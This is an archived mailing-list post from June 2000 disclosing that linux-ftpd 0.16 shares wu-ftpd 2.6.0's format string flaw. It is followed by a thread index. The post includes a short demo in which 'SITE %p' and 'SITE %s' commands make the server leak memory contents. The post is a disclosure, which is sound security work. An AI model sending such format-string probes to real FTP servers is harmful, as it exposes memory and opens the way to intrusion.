Vulnerability Development mailing list archives

linux-ftpd 0.16 is also vulnerable

From: prrar () NITNET COM BR (Paulo Ribeiro)
Date: Tue, 27 Jun 2000 23:53:19 -0300


Hello.

As I can see, linux-ftpd 0.16 is as vulnerable as wu-ftpd-2.6.0.

Demo.:

ftp> SITE %p
500 'SITE 0X805F520': command not understood.
ftp> SITE %s
500 'SITE @:E:': command not understood.
(...)

This e-mail was sent to BUGTRAQ and to the its authors.

Yours,
Paulo Ribeiro.

Current thread:

dalnet 4.6.5 remote vulnerability, (continued)
- - - dalnet 4.6.5 remote vulnerability Matt Conover (Jun 28)
    - *snprinf vs strncpy (misconception) Matt Conover (Jun 28)
- Re: Another new worm??? Crispin Cowan (Jun 24)
- Re: Another new worm??? sigipp () WELLA COM BR (Jun 26)
  - Re: Another new worm??? Mark Rafn (Jun 26)
  - Re: Another new worm??? Blue Boar (Jun 26)
    - Webramp 310e Call Back Tom Sutherland (Jun 27)
    - Re: Another new worm??? Erik Debill (Jun 27)
    - HP's OpenMail 6.0 for linux. Larry Cashdollar (Jun 27)
  - Re: Another new worm??? Dimitry Andric (Jun 27)
  - linux-ftpd 0.16 is also vulnerable Paulo Ribeiro (Jun 27)
    - Re: linux-ftpd 0.16 is also vulnerable Daniel Jacobowitz (Jun 28)
- Re: Another new worm??? Dan Schrader (Jun 26)
- Re: Another new worm??? edurflinger () CORNINGDATA COM (Jun 28)
- Re: Another new worm??? Dan Schrader (Jun 28)
  - Re: Another new worm??? Blue Boar (Jun 28)
- Re: Another new worm??? tschweikle () FIDUCIA DE (Jun 28)